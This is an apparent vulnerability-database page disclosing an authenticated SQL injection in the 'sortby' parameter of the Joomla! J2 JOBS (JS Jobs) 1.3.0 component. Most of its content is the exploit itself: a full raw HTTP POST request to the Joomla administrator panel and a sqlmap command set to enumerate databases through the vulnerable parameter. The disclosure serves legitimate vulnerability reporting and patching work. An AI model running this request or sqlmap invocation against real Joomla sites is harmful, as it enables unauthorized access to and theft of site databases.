Joomla! J2 JOBS 1.3.0 sortby Authenticated SQL Injection

2020.07.07

Credit: Mehmet Kelepçe / Gais Cyber Security

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

# Exploit Title: Joomla! J2 JOBS 1.3.0 - 'sortby' Authenticated SQL Injection
# Date: 2020-06-17
# Exploit Author: Mehmet Kelepçe / Gais Cyber Security
# Vendor Homepage: https://joomsky.com/
# Software Link: https://joomsky.com/products/js-jobs-pro.html
# Change Log (Update) : https://joomsky.com/products/js-jobs.html
# Version: 1.3.0
# Tested on: Kali Linux - Apache2
Vulnerable param: sortby
-------------------------------------------------------------------------
POST /joomla/administrator/index.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/joomla/administrator/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 233
Connection: close
Cookie: COOKIES
Upgrade-Insecure-Requests: 1
js_sortby=4&companyname=12&jobtitle=12&location=12&jobcategory=&jobtype=&datefrom=&dateto=&option=com_jsjobs&task=&c=job&view=job&callfrom=jobqueue&layout=jobqueue&sortby=asc&my_click=&boxchecked=0&d90ced5aa929447644f09b56c8d8ba12=1
-------------------------------------------------------------------------
sqlmap poc:
sqlmap -r jsjobs --dbs --risk=3 --level=5 --random-agent -p sortby

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Joomla! J2 JOBS 1.3.0 sortby Authenticated SQL Injection

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.